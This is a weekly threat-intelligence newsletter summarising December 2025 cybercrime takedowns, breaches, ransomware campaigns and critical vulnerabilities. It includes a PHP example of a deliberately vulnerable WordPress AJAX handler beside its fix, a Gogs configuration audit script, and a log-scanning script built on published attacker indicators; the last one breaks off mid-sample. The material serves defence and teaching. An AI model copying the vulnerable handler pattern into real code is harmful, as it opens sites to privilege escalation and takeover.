VerSprite Weekly Threat Intelligence #44

Date Range: 08 December 2025 – 12 December 2025

Issue: 44th Edition

Reported Period Victimology

Security Triumphs of the Week

This week saw significant global security victories: Europol dismantled a $700M crypto laundering network using deepfakes and fraudulent platforms, while the U.S. disrupted AI chip smuggling to China via Operation Gatekeeper. Indonesia neutralized a cybercrime ring that had operated for 14 years while mimicking state-sponsored actors, and Ukrainian hacker Victoria Dubranova faced extradition for attacks on U.S. infrastructure. The EU fined X €120M for deceptive verification enabling scams, and the UK penalized LastPass £1.2M for lax security exposing user data. ACE shut down MKVCinemas’ piracy empire, underscoring coordinated efforts against cybercrime, fraud, and illicit tech trade.


Europol takes down crypto and laundering network worth 700 million
Europol dismantled a $700 million cryptocurrency laundering network through coordinated raids in Cyprus, Germany, and Spain, arresting nine suspects and seizing $1.7 million in assets. The network operated fraudulent crypto investment platforms, fake customer support centers, and affiliate marketing schemes to defraud victims. Scammers used aggressive tactics, including criminal call centers pressuring victims to invest more, and deepfake videos featuring celebrities like Elon Musk to promote fake high-return schemes. The operation targeted both the laundering infrastructure and the advertising networks enabling the scams. Europol described the network as a vast, multi-country operation involving deceitful platforms and money laundering. This takedown followed investigations into fraudulent crypto platforms, revealing a complex criminal enterprise.
Read full article: Techradar

DoJ takes down sophisticated network smuggling $160m worth of AI chips to China
The U.S. Department of Justice dismantled a smuggling network illegally exporting $160 million worth of Nvidia H100/H200 AI chips to China, arresting Benlin Yuan and Fanyue Gong. The operation, labeled “Gatekeeper,” involved relabeling GPUs as “SANDKYAN” to bypass export controls, aiming to protect U.S. AI and military technological superiority. Despite the crackdown, President Trump authorized Nvidia to legally sell these chips to China, highlighting tensions between security concerns and trade policies. The suspects used U.S. warehouses to strip Nvidia branding and falsify shipment destinations. The DoJ emphasized the strategic importance of AI chip control for national security.
Read full article: Techradar

National cybercrime network operating for 14 years dismantled in Indonesia
A cybercrime network that had operated in Indonesia for 14 years, resembling state-sponsored operations, was dismantled. The infrastructure included over 320,000 domains, hijacked government subdomains, and thousands of malware-infected Android apps. Attackers used AWS and Firebase for command-and-control, stealing 50,000+ gambling credentials and selling data on dark web markets. Researchers from Malanta.ai noted the operation’s sophistication, scale, and use of reverse proxies to mask malicious traffic as legitimate government communications. The campaign’s longevity and resources suggest potential nation-state involvement, though no direct government link was confirmed. The network evolved from gambling sites into a global, well-funded threat infrastructure.
Read full article: Techradar

US extradites Ukrainian woman accused of hacking meat processing plant for Russia
A Ukrainian woman, Victoria Dubranova, was extradited to the U.S. and charged for allegedly hacking U.S. critical infrastructure, including a meat processing plant and public water systems, on behalf of Russian-linked groups CyberArmyofRussia_Reborn (CARR) and NoName057(16). The attacks caused physical damage, such as spoiled meat and water system breaches, with ties to Russia’s GRU and FSB. Dubranova faces up to 27 years in prison for conspiracy, computer damage, and identity theft. U.S. agencies linked CARR and NoName to Russian state-backed cyber campaigns, offering rewards for information on group members. Authorities urged securing operational technology (OT) systems, emphasizing vulnerabilities in critical infrastructure exploited by unsophisticated yet disruptive attacks. International efforts, including Operation Eastwood, disrupted NoName’s infrastructure.
Read full article: Theregister

Crypto-crasher Do Kwon jailed for 15 years over $40bn UST bust
Terraform Labs founder Do Kwon was sentenced to 15 years in prison for orchestrating a fraud scheme tied to the collapse of the TerraUSD (UST) stablecoin, which erased $40 billion in value. Promoted as a stablecoin pegged to $1, UST’s complex algorithmic mechanisms and linked Luna token failed in May 2022, crashing its value to $0.09 despite a failed $3.5 billion Bitcoin bailout. Kwon, arrested in Montenegro using a fake passport, was extradited to the U.S., where he pleaded guilty to fraud charges. Prosecutors emphasized the scheme’s “epic” scale, with victims losing life savings and facing prolonged financial hardship. The SEC secured $4.5 billion from Terraform’s liquidation, covering only 10% of losses.
Read full article: Theregister

EU fines X $140m, tied to verification rules that make impostor scams easier
The EU fined X (formerly Twitter) €120 million under the Digital Services Act for transparency failures, including a deceptive verification system allowing paid “verified” status without identity checks, enabling impersonation scams. The penalty also addresses X blocking researcher access to public data and lacking ad transparency, hindering risk assessments. After Musk’s verification overhaul, fake accounts surged, exemplified by a fraudulent Eli Lilly post causing stock drops. X faces deadlines to address violations, with non-compliance risking further fines. The platform’s lax verification persists, undermining trust in account authenticity. Ongoing EU probes target X’s recommendation systems and content moderation.
Read full article: Malwarebytes

UK ICO Fines LastPass Over 2022 Data Breach
The UK Information Commissioner’s Office (ICO) fined LastPass £1.2 million for a 2022 breach exposing data of 1.6 million British users, including emails, IP addresses, names, and phone numbers. Attackers compromised a developer’s MacBook, stole source code, and later exploited a Plex vulnerability to install a keylogger on another developer’s device, accessing AWS decryption keys. The ICO cited inadequate access controls, allowing employees to link business and personal vaults under one master password. LastPass’s post-breach measures, like restricting personal device use and separating accounts, led to a 30% fine reduction. The company claims user passwords remained secure due to zero-knowledge architecture.
Read full article: Bankinfosec

MKVCinemas streaming piracy service with 142M visits shuts down
The MKVCinemas piracy streaming service, which attracted 142.4 million visits between 2024-2025, was shut down by the Alliance for Creativity and Entertainment (ACE). Supported by major studios like Disney and Netflix, ACE dismantled the network and 25 domains, redirecting users to legal platforms. The operator in Bihar, India, ceased operations and transferred domain control. ACE also disabled a file-cloning tool with 231.4 million visits used to distribute copyrighted content in India and Indonesia. This follows recent ACE actions against Photocall TV piracy (26M users/year) and other illegal streaming networks, emphasizing global anti-piracy efforts.
Read full article: Bleepingcomputer


Security Setbacks of the Week

This week’s security setbacks underscore persistent third-party and supply chain vulnerabilities, with major breaches at a MongoDB database (2 billion PII records), Aeroflot via Bakka Soft, and Asus’ supplier exposing sensitive data. Ransomware attacks targeted healthcare (NHS, Memorial Hospital, Inotiv) and critical infrastructure, exploiting weak vendor security and zero-days, while legal actions and financial penalties surged post-breach. Cryptocurrency threats included hardware vulnerabilities, laundering schemes, and violent thefts. Global incidents, from South Korea’s Coupang breach (34M users) to Europol’s crypto takedown, highlight systemic risks in access management, breach detection, and delayed mitigations, emphasizing the need for proactive defense and vendor oversight.


16TB of corporate intelligence data exposed in one of the largest lead-generation dataset leaks
A 16TB MongoDB database containing nearly 2 billion PII records was found exposed online, marking one of the largest lead-generation dataset leaks. The data, likely scraped from LinkedIn and Apollo.io, included names, emails, phone numbers, employment details, social media links, and photos. Researchers suspect ties to a lead-generation company aiding B2B customer outreach. The database was secured after disclosure, but its exposure duration and potential malicious access remain unclear. The leak poses significant risks of identity theft, fraud, and targeted phishing. While ownership wasn’t confirmed, the company in question secured the data two days post-contact. Unprotected databases continue to be a critical vulnerability in data security.
Read full article: Techradar

Russian airline hack came through third-party tech vendor
A cyberattack on Russia’s Aeroflot airline in July was reportedly a supply-chain breach via third-party software developer Bakka Soft, which lacked two-factor authentication (2FA) and had existing network access. Attackers exploited months-old vulnerabilities to deploy malware, disrupting over 100 flights and causing tens of millions in damages. Ukrainian and Belarusian hacktivist groups claimed responsibility. The Bell, a Russian media outlet labeled a “foreign agent,” cited sources linking Bakka Soft’s compromised systems to the attack, though details remain unverified. Aeroflot had detected suspicious activity months prior but failed to bolster security. The incident highlights risks of third-party vendor vulnerabilities in critical infrastructure.
Read full article: Techradar

Asus supplier hit by ransomware attack as gang flaunts alleged 1 TB haul
A ransomware attack targeted an Asus supplier, with the Everest gang claiming theft of 1 TB of data, including phone camera source code, AI models, internal tools, and test files. Asus confirmed the third-party breach but stated no impact on its products, systems, or customer data, emphasizing supply chain security improvements. Everest alleged compromising data from Asus, ArcSoft, and Qualcomm, though Asus did not validate these broader claims. The incident follows recent revelations of ~50,000 Asus routers hijacked in a suspected China-linked botnet campaign. While unrelated, both events raise concerns over Asus’s security posture and supply chain resilience amid active exploitation of its devices. The company has not clarified if stolen data includes proprietary or third-party content.
Read full article: Theregister

UK Hospital Asks Court to Stymie Ransomware Data Leak
A UK National Health Service (NHS) hospital, Barts Health, is seeking a High Court order to prevent the Clop ransomware group from leaking data stolen in an August attack. The breach compromised invoice data containing patient and staff names, addresses, and payment details but did not affect core IT systems. Clop exploited a zero-day vulnerability in Oracle E-Business Suite, demanding ransoms up to $50 million. The incident follows other ransomware attacks on NHS suppliers, such as the 2024 Synnovis breach, prompting NHS England to introduce voluntary cybersecurity measures for IT vendors. Authorities, including the National Cyber Security Centre, are assessing the impact.
Read full article: Bankinfosec

Drug R&D Firm Facing Costs, Lawsuits in Alleged Qilin Attack
Inotiv, a drug research firm, faces ongoing financial and legal repercussions from an August cyberattack attributed to the Qilin ransomware gang. The company reported $2.48 million in incident-related costs for Q4 2025, totaling nearly $5.93 million for the fiscal year, alongside notifying 9,542 individuals of potential data exposure. Compromised data included names and identifiers of employees, their families, and others linked to the company. Inotiv restored some systems but has not yet determined the full operational or financial impact. Three consolidated class-action lawsuits in Indiana allege negligence in safeguarding data, citing Qilin’s theft of 176 GB of data and dark web leaks. The firm offers affected individuals 24 months of credit monitoring.
Read full article: Bankinfosec

Hospice Firm, Eye Care Practice Notifying 520,000 of Hacks
VITAS Hospice Services and Tri Century Eye Care reported separate hacking incidents affecting 319,177 and 200,000 individuals, respectively. VITAS’ breach occurred via a compromised vendor account, exposing personal and medical data, including Social Security numbers and treatment details. Tri Century’s breach involved unauthorized network access, compromising similar sensitive information. Both organizations notified HHS, implemented enhanced security measures, and offered credit monitoring to affected individuals. These incidents reflect a broader trend of cyberattacks targeting specialty healthcare providers. VITAS’ breach is the largest reported by a hospice provider, while Tri Century’s adds to numerous eye care sector breaches in recent years.
Read full article: Bankinfosec

Georgia Hospital Settles Lawsuit in Alleged Embargo Hack
Memorial Hospital and Manor in Georgia settled a class action lawsuit following a 2024 ransomware attack by the Embargo gang, which exposed 1.15 TB of data affecting 105,170 patients. The breach compromised sensitive information, including Social Security numbers and health data. The settlement offers three compensation options: up to $5,000 for documented losses, up to $100 for time spent addressing the breach, or a $40 one-time payment. All class members receive a year of medical data monitoring and $1 million identity theft insurance. The hospital agreed to pay up to $500,000 in legal fees and service awards but did not commit to specific security improvements. Embargo, a newer ransomware group, has targeted multiple sectors, including healthcare. A final settlement approval hearing is set for January 2026.
Read full article: Bankinfosec

Cryptohack Roundup: Android Chips Hot Wallet Attack
The article highlights several cybersecurity incidents in the cryptocurrency space. Ledger warned of a vulnerability in Android chips (MediaTek Dimensity 7300) allowing physical attacks to extract private keys from hot wallets via electromagnetic fault injection. Europol dismantled a criminal network laundering €700 million through fake crypto platforms, seizing assets across Europe. A British hacker linked to the $243 million Genesis theft was reportedly arrested, with crypto assets seized. A member of a $263 million social engineering ring pleaded guilty to laundering funds stolen via fabricated cybersecurity alerts. Additionally, two suspects were arrested in Vienna for a crypto-linked killing involving coerced wallet access and theft.
Read full article: Bankinfosec

Users report chaos as Legal Aid Agency stumbles back online after cyberattack
The UK Legal Aid Agency (LAA) resumed operations seven months after a major cyberattack, but law firms report ongoing technical issues with its Client and Cost Management System (CCMS). Users face abrupt session timeouts, lost work due to security-driven AWS browser integration, and cumbersome document management processes with strict file size and naming rules. A new multifactor authentication system (SILAS) has extended login times, adding friction. While the LAA claims full service restoration with enhanced security, persistent system instability and laborious workflows frustrate users. The 2023 breach exposed sensitive legal aid data dating back to 2010, though details remain restricted under a government injunction.
Read full article: Theregister

Investigators raid Coupang HQ following data breach affecting 34 million
South Korean authorities raided Coupang’s headquarters following a massive data breach impacting 34 million customers, with attackers accessing names, emails, phone numbers, addresses, and order details. The breach, undetected from June to November 2025, was linked to a former employee’s account misuse. Over 10,000 victims are pursuing a class-action lawsuit seeking $68 per person in compensation. Police seized internal documents and server logs to investigate the leak’s origin and cause. Coupang, dubbed the “Amazon of South Korea,” is cooperating with government agencies to mitigate further risks. The incident highlights critical lapses in access management and breach detection.
Read full article: Techradar


The New Emerging Threats

Emerging cyber threats showcase escalating state-aligned and criminal operations targeting critical infrastructure with advanced tactics. Chinese state-sponsored actors (Brickworm) and pro-Russia hacktivists exploit vulnerabilities for espionage and sabotage, while ransomware groups (01flip, Warlock) leverage Rust, BYOVD, and RaaS models to evade detection. Phishing campaigns abuse HR themes and Okta/Microsoft integrations to hijack sessions, while AI-driven synthetic fraud and deepfake job scams exploit weak identity controls. Packer-as-a-service (Shanya) and PhaaS kits (GhostFrame) lower barriers for sophisticated attacks, emphasizing the convergence of geopolitical motives, financial crime, and evolving evasion techniques across APAC, North America, and critical sectors.


Chinese hackers used Brickworm malware to breach critical US infrastructure
Chinese state-sponsored hackers deployed Brickworm malware to infiltrate global government and IT networks, targeting VMware vSphere and Windows systems to enable persistent access, file manipulation, and Active Directory compromise. A joint report by CISA, NSA, and Canada’s Cyber Security Centre revealed the malware’s use in long-term espionage, data exfiltration, and potential sabotage, with incidents including a 2024 breach of a U.S. organization’s network. CrowdStrike noted its use against an Asia-Pacific government entity. China denied involvement, labeling the U.S. as a “cyber-bully,” while CISA warned of ongoing risks to critical infrastructure. The campaign highlights escalating cyber threats linked to Chinese actors targeting geopolitical adversaries.
Read full article: Techradar

New 01flip Ransomware Hits APAC Critical Infra: Cross-Platform Rust Weapon Uses Sliver C2
A new ransomware named 01flip, written in Rust for cross-platform attacks, is targeting critical infrastructure in the APAC region, notably in the Philippines and Taiwan. Developed by threat cluster CL-CRI-1036, it uses Sliver C2 for lateral movement and exploits vulnerabilities like CVE-2019-11580 for initial access. The manual, financially motivated attacks involve data exfiltration and dark web leaks. Code references to “lockbit” suggest potential ties to LockBit, though no direct evidence confirms this. The use of Rust highlights evolving evasion tactics, posing detection challenges for defenders. Palo Alto Networks’ Unit 42 warns of its early-stage but high-impact activity.
Read full article: Securityonline

US Warns of Ongoing Pro-Russia Critical Infrastructure Hacks
U.S. and allied agencies warned pro-Russia hacktivists are targeting critical infrastructure using low-skill techniques like exploiting exposed remote access tools with weak authentication. Groups such as Cyber Army of Russia Reborn and NoName057(16) opportunistically breach operational technology, risking physical disruptions in sectors like water and energy. Ukrainian national Victoria Dubranova was extradited and indicted for supporting these groups, allegedly tampering with U.S. water systems, including a 2024 Texas incident causing overflow. Attacks, though less sophisticated than state-sponsored operations, exploit poor network segmentation, enabling access to control systems. Prosecutors link these groups to Russian government support for funding cybercrime tools. The advisory emphasizes risks to critical infrastructure from persistent, opportunistic breaches.
Read full article: Bankinfosec

GOLD BLADE APT Hits Canadian Firms with BYOVD EDR Killer and Ransomware Delivered Via Fake Resumes
The GOLD BLADE APT group (aka RedCurl/RedWolf) has targeted Canadian organizations in a campaign combining corporate espionage and ransomware since early 2024. Using weaponized resumes delivered via recruitment platforms like Indeed, they deploy RedLoader malware and a BYOVD (Bring Your Own Vulnerable Driver) technique to disable EDR and Windows security mechanisms. The group selectively uses QWCrypt ransomware for monetization, shifting from traditional phishing to stealthier HR-themed social engineering. Sophos reports their tactics include abusing vulnerable Zemana drivers and modifying system registries to bypass defenses. GOLD BLADE’s calculated, evolving methods reflect a professionalized operation focused on high-impact intrusions.
Read full article: Securityonline

Sophisticated Okta SSO Phishing Bypasses Defenses to Steal Session Tokens With Salary Review Lures
A sophisticated phishing campaign exploiting Okta SSO and Microsoft 365 integrations is targeting organizations with salary review-themed lures to steal session tokens. Active since December 2025, attackers send HR-themed emails with urgent subjects and encrypted PDFs to bypass security scanners. The operation uses a proxy system mimicking legitimate Okta login pages, dynamically redirecting victims from fake Microsoft 365 pages to phishing sites. Malicious scripts capture credentials and critical session cookies (e.g., “JSESSIONID”) via client-side injection, enabling session hijacking. Attackers leverage Cloudflare to mask infrastructure and continuously refine evasion tactics. This campaign highlights advanced session token theft techniques bypassing multi-factor authentication.
Read full article: Securityonline

Synthetic Businesses: The New Billion-Dollar Fraud Machine
Synthetic entity fraud, leveraging fake businesses, has surged due to weak U.S. state registration controls and AI-generated documents, enabling fraudsters to create fraudulent entities for under $150 with potential payouts exceeding $100,000 per identity. Outdated business registration systems, lacking identity verification and address validation, allow criminals to exploit AI-generated bank statements, invoices, or stolen data to mimic legitimacy. Andrew La Marca of Dun & Bradstreet highlights AI’s role in automating document fabrication and streamlining fraud processes, exacerbating risks for lenders and private equity firms. The low-cost, high-reward model and poor oversight in online registries have transformed this threat from niche to mainstream, demanding enhanced due diligence and regulatory controls to mitigate financial and compliance risks.
Read full article: Bankinfosec

Hackers observed injecting legitimate banking apps with malicious code
A cybercriminal group, likely GoldFactory, is injecting legitimate banking apps with malicious code to steal credentials and conduct financial fraud. The attackers decompile authentic apps, insert remote-access trojans or backdoors, and distribute them via phishing campaigns and fake websites mimicking governments or service providers. Advanced malware families like SkyHook and FriHook enable device takeover, data capture, and remote control while evading detection. The campaign primarily targets Asia-Pacific users, compromising tens of thousands and exposing financial institutions. GoldFactory previously used biometric data theft and deepfakes (e.g., GoldPickaxe) to infiltrate banking systems. The group’s tactics highlight sophisticated social engineering and technical evasion techniques.
Read full article: Techradar

GOLD SALEM tradecraft for deploying Warlock ransomware
The GOLD SALEM cybercrime group has deployed Warlock ransomware since March 2025, exploiting SharePoint vulnerabilities (including ToolShell zero-days) and leveraging tools like Velociraptor, Cloudflared, and AV/EDR-killers for initial access, defense evasion, and C2. Their tradecraft includes credential theft, DLL side-loading, and BYOVD attacks using Chinese signed drivers. Targeting sectors like government, energy, and IT, they deployed Warlock (based on LockBit 3.0), LockBit, and Babuk ransomware. While victimology overlaps with Chinese state interests, activities appear financially motivated. Sophos recommends securing SharePoint instances and deploying robust AV/EDR to counter their evolving tactics.
Read full article: Sophos

Inside Shanya, a packer-as-a-service fueling modern attacks
The article discusses Shanya, a new packer-as-a-service (PaaS) tool used by ransomware groups to evade detection. Shanya offers anti-analysis features, unique encryption per customer, and EDR bypass techniques, making it a successor to HeartCrypt. It employs API hashing, memory manipulation, and kernel driver abuse to disable security tools. The packer has been linked to EDR-killer malware and CastleRAT, deployed via DLL sideloading in attacks targeting sectors like hospitality. Sophos identified its use in Akira, Qilin, and Crytox ransomware operations, with detections globally, notably in UAE and Tunisia. Protections include specific signatures to block Shanya-related threats.
Read full article: Sophos

Deepfakes, AI resumes, and the growing threat of fake applicants
Fake job applicants using AI-generated resumes, fabricated identities, and deepfake interviews pose significant cybersecurity risks. Attackers employ polished, AI-crafted materials to bypass hiring systems, aiming for financial gain, identity fraud, or corporate system access. Tactics include subcontracting roles to cheaper labor, forging employment documents, and harvesting data to refine future scams. Advanced methods involve real-time deepfakes with subtle flaws, while LinkedIn profiles are scraped to build credible impostor identities. Recruiters must verify identities via video checks, cross-reference details, and secure onboarding processes. Proactive screening is critical to prevent breaches and protect organizational integrity.
Read full article: Malwarebytes

Russian hackers debut simple ransomware service, but store keys in plain text
CyberVolk, a pro-Russian hacktivist group, has reemerged with a ransomware-as-a-service (RaaS) operation called VolkLocker, managed entirely via Telegram to simplify attacks for less skilled affiliates. The ransomware, targeting both Linux and Windows systems, uses AES-256 encryption but critically hardcodes master keys into executables and stores them in plaintext, enabling victims to potentially recover files without paying ransoms. Despite sophisticated Telegram automation for payload generation and command-and-control, the group’s operational flaws, like retaining test artifacts, highlight quality control issues amid rapid expansion. SentinelOne researchers note CyberVolk’s blend of ransomware and hacktivism reflects broader trends of politically motivated actors lowering barriers to cybercrime. While lacking direct Kremlin ties, the group’s resurgence underscores evolving threats from state-aligned collectives leveraging accessible platforms like Telegram.
Read full article: Theregister


Vulnerability Spotlight: Critical Exposures Unveiled

Critical vulnerabilities across widely used platforms dominated cybersecurity efforts, with CISA flagging active exploitation of GeoServer’s XML flaw (CVE-2025-58360) and WordPress Soledad theme privilege escalation (CVE-2025-64188). Major vendors like Google and Microsoft addressed zero-days in Chrome and Windows, while unpatched RCEs in Gogs and React Server Components fueled attacks, including cryptomining and espionage. Leaked tools like ValleyRAT’s builder and Intellexa’s Predator spyware amplified threats, exploiting zero-days and encryption flaws. Cloud risks surged as Docker Hub images exposed live credentials, and AI systems like Gemini faced data exfiltration via poisoned inputs. Urgent patching and enhanced safeguards remain critical amid escalating exploitation.


CISA KEV Alert: GeoServer XXE Flaw Under Active Attack Risks Data Theft & Internal Network Scanning
CISA added a critical XXE vulnerability (CVE-2025-58360) in GeoServer to its Known Exploited Vulnerabilities catalog due to active exploitation. The flaw in GeoServer’s XML processing via the /geoserver/wms endpoint allows attackers to read arbitrary files, perform SSRF-based internal network scanning, and launch DoS attacks. Federal agencies must patch by January 1, 2026. GeoServer maintainers released fixes in versions 2.25.6, 2.26.3, and 2.27.0. Immediate patching is urged to mitigate risks of data theft and unauthorized network access. CISA emphasizes the vulnerability’s severity as a frequent attack vector.
Read full article: Securityonline

CVE-2025-64188 (CVSS 9.8): Critical “Soledad” Theme Flaw Lets Subscribers Take Over WordPress Sites
A critical vulnerability (CVE-2025-64188, CVSS 9.8) in the Soledad WordPress theme (versions ≤8.6.9) allows low-privileged users (e.g., Subscribers) to escalate privileges and fully compromise sites. The flaw stems from improper access controls in the theme’s penci_update_option AJAX function, which lacked user permission checks despite nonce validation. Attackers could abuse this to modify critical settings like enabling open registration with Administrator roles. Patched in version 8.6.9.1, the fix adds a permissions check to restrict unauthorized access. Administrators must update immediately to prevent site takeover risks.
Read full article: Securityonline
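The bug class described above, as an added illustration that is not the Soledad theme's actual code: a WordPress AJAX handler that validates a nonce but never checks the caller's capability, shown beside a hardened version. The handler names, the AJAX action and the nonce action (example_update_option, example_settings_nonce) are hypothetical.

```php
<?php
// Added illustration of the bug class described above; not the Soledad theme's
// own code. Handler names, the AJAX action and the nonce action are hypothetical.

// Vulnerable pattern: a nonce check is CSRF protection, not authorization.
// wp_ajax_* hooks fire for ANY logged-in user, including Subscribers, and themes
// commonly print the nonce into page markup for every logged-in user, so each
// check in this handler passes for a Subscriber.
function example_update_option_vulnerable() {
    check_ajax_referer( 'example_settings_nonce', 'nonce' );

    $name  = sanitize_key( $_POST['option_name'] ?? '' );
    $value = sanitize_text_field( wp_unslash( $_POST['option_value'] ?? '' ) );

    // Writing arbitrary core options is what turns this into site takeover:
    // e.g. users_can_register = 1 together with default_role = administrator.
    update_option( $name, $value );
    wp_send_json_success();
}
add_action( 'wp_ajax_example_update_option', 'example_update_option_vulnerable' );

// Hardened pattern: keep the nonce check, add a capability check, and only
// allow writes to the theme's own, allow-listed option keys.
function example_update_option_fixed() {
    check_ajax_referer( 'example_settings_nonce', 'nonce' );

    // Authorization: only users who may manage site settings get past this line.
    // wp_send_json_error() ends the request, so no return is needed.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // Allow-list of theme-owned keys; core options such as users_can_register
    // or default_role can never be reached through this endpoint.
    $allowed = array( 'example_layout', 'example_accent_color' );
    $name    = sanitize_key( $_POST['option_name'] ?? '' );
    if ( ! in_array( $name, $allowed, true ) ) {
        wp_send_json_error( array( 'message' => 'Unknown option.' ), 400 );
    }

    $value = sanitize_text_field( wp_unslash( $_POST['option_value'] ?? '' ) );
    update_option( $name, $value );
    wp_send_json_success();
}
add_action( 'wp_ajax_example_update_option_fixed', 'example_update_option_fixed' );
```

A quick audit of any theme or plugin is to list its wp_ajax_ hooks and confirm each handler reaches a current_user_can() check before any update_option() or similar write.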

December Patch Tuesday fixes three zero-days, including one that hijacks Windows devices
Microsoft’s December Patch Tuesday addressed 57 security vulnerabilities, including three actively exploited zero-days. Critical fixes target Windows 10, 11, Server, Office, and related services. The resolved zero-days include CVE-2025-62221 (privilege escalation in Windows Cloud Files Mini Filter Driver), CVE-2025-64671 (GitHub Copilot RCE), and CVE-2025-54100 (PowerShell RCE). A new PowerShell warning now alerts users when “Invoke-WebRequest” runs without safe parameters to prevent unintended script execution from web content. Windows 10 users receive only security updates, as feature updates are discontinued. Microsoft recommends applying patches via Windows Update to mitigate risks from these exploits.
Read full article: Malwarebytes

Zero Day: 700 Instances of Self-Hosted Git Service Exploited
A zero-day vulnerability (CVE-2025-8110) in the self-hosted Git service Gogs has been actively exploited, compromising over 700 internet-exposed instances. The flaw enables remote code execution, allowing attackers to steal repositories, deploy cryptominers, or potentially stage ransomware. Researchers at Wiz identified the unpatched flaw after analyzing a customer’s malware infection linked to a malicious Git repository pattern. Attackers used the SuperShell framework to establish reverse SSH connections, indicating financially motivated operations. Gogs maintainers acknowledged the issue but have not yet released a patch, with exploitation continuing since July. Mitigations include disabling open registration and restricting external access to Gogs instances until updates are available.
Read full article: Bankinfosec
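Since no Gogs patch is available, the only controls are configuration. The script below, an added example rather than code from Gogs or from Wiz, reads a Gogs app.ini and reports whether the interim mitigations are in place. It relies on Gogs' real app.ini keys ([service] DISABLE_REGISTRATION and [server] HTTP_ADDR); the REQUIRE_SIGNIN_VIEW check is an extra hardening step beyond what the article lists, and both sample configurations are constructed.

```python
"""Audit a Gogs app.ini against the interim mitigations in the item above
(close self-registration, keep the instance off the open internet).

Added example, not Gogs' or Wiz's code. It reads Gogs' real app.ini keys
([service] DISABLE_REGISTRATION and REQUIRE_SIGNIN_VIEW, [server] HTTP_ADDR);
both sample configurations below are constructed for illustration.
"""
import configparser

# Constructed sample: a typical exposed deployment (open sign-up, listening on all interfaces).
WEAK_APP_INI = """
[server]
HTTP_ADDR = 0.0.0.0
HTTP_PORT = 3000

[service]
DISABLE_REGISTRATION = false
REQUIRE_SIGNIN_VIEW = false
"""

# Constructed sample: the same instance after the mitigations, bound to loopback so it is
# only reachable through a VPN or an authenticating reverse proxy.
HARDENED_APP_INI = """
[server]
HTTP_ADDR = 127.0.0.1
HTTP_PORT = 3000

[service]
DISABLE_REGISTRATION = true
REQUIRE_SIGNIN_VIEW = true
"""

LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def audit_gogs_config(app_ini_text: str) -> list:
    """Return findings as strings; an empty list means the interim mitigations are in place."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(app_ini_text)
    findings = []

    # Gogs' shipped default for these keys is false, so an absent key is reported too.
    if not cfg.getboolean("service", "DISABLE_REGISTRATION", fallback=False):
        findings.append("[service] DISABLE_REGISTRATION is not true: anyone who can reach the "
                        "listener can create an account on an instance that cannot yet be patched")
    if not cfg.getboolean("service", "REQUIRE_SIGNIN_VIEW", fallback=False):
        findings.append("[service] REQUIRE_SIGNIN_VIEW is not true: repositories and the web "
                        "UI are browsable without signing in")
    addr = cfg.get("server", "HTTP_ADDR", fallback="0.0.0.0")
    if addr not in LOOPBACK:
        findings.append(f"[server] HTTP_ADDR = {addr}: listener is reachable beyond the host; "
                        "bind to loopback and publish only through a VPN or authenticating proxy")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_APP_INI), ("hardened", HARDENED_APP_INI)):
        print(label, "->", audit_gogs_config(text) or "ok")
```

Point it at the live app.ini (usually custom/conf/app.ini under the Gogs install) and treat any finding as a blocker until the maintainers ship a fix; binding to loopback alone does not help if a reverse proxy in front of it still exposes the service without authentication.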

Military-Grade ValleyRAT Goes Rogue: Kernel Rootkit Builder Leak Triggers Massive Global Surge
The article details the proliferation of ValleyRAT, a sophisticated modular backdoor and kernel rootkit, following the leak of its builder tool. Previously restricted to Chinese-linked threat actors like Silver Fox, the malware’s public availability has led to an 85% surge in global detections over six months. ValleyRAT’s advanced capabilities include bypassing Windows 11 security via signed drivers, stealthy driver installation, and disabling antivirus tools. The leak complicates attribution, enabling cybercriminals to customize attacks, escalating risks for enterprises. Researchers warn of its transition to a widely accessible framework, amplifying threats from previously exclusive military-grade tools.
Read full article: Securityonline

Hackers exploit Gladinet CentreStack cryptographic flaw in RCE attacks
Hackers are exploiting a cryptographic vulnerability in Gladinet’s CentreStack and Triofox products, leveraging hardcoded AES encryption keys and initialization vectors to decrypt access tickets and achieve remote code execution (RCE). The static keys, derived from fixed Chinese and Japanese text strings, allow attackers to forge access tickets, access sensitive files, and exploit a ViewState deserialization flaw for RCE. At least nine organizations across sectors like healthcare and technology have been targeted. Gladinet released patches (version 16.12.10420.56791) and advised rotating machine keys. Indicators of compromise include the IP 147.124.216[.]205 and the string “vghpI7EToZUDIZDdprSubL3mTZ2” in logs. Immediate updates and log scans are recommended.
Read full article: Bleepingcomputer
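Two questions a responder needs answered quickly for this advisory are whether the installed build predates the fix and whether the published indicators appear in the web logs. The following triage script is an added example, not Gladinet's code; the fixed version and both indicators are the ones given in the article, while the log lines, their IIS-style W3C layout, the request paths and the older build number are all constructed.

```python
"""Triage helper for the Gladinet CentreStack/Triofox advisory above: is the installed
build older than the fixed one, and do the web logs show either published indicator?

Added example, not Gladinet's code. FIXED_VERSION and both indicators come from the
article; the log lines and their field layout are constructed for illustration.
"""
import re

FIXED_VERSION = "16.12.10420.56791"
IOC_IP = "147.124.216[.]205"           # defanged, as published
IOC_STRING = "vghpI7EToZUDIZDdprSubL3mTZ2"


def refang(ioc: str) -> str:
    """Turn a defanged indicator ('1.2.3[.]4', 'hxxp://') back into its literal form."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def version_tuple(version: str) -> tuple:
    return tuple(int(part) for part in version.strip().split("."))


def is_vulnerable_build(installed: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the installed build predates the fix. Compare numerically: as strings,
    '16.12.9000.1' would sort *after* '16.12.10420.56791' and be missed."""
    return version_tuple(installed) < version_tuple(fixed)


IOC_PATTERNS = [
    ("attacker ip", re.compile(re.escape(refang(IOC_IP)))),
    ("published log string", re.compile(re.escape(IOC_STRING))),
]


def scan_log_lines(lines) -> list:
    """Return (line_number, indicator_name, line) for every line containing an indicator."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for name, pattern in IOC_PATTERNS:
            if pattern.search(line):
                hits.append((number, name, line.rstrip()))
    return hits


# Constructed sample log. Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
SAMPLE_LOG = """\
2025-12-09 03:12:44 10.0.0.7 GET /portal/login.aspx - 200
2025-12-09 03:13:01 147.124.216.205 GET /portal/login.aspx - 200
2025-12-09 03:13:05 147.124.216.205 POST /portal/login.aspx t=vghpI7EToZUDIZDdprSubL3mTZ2 302
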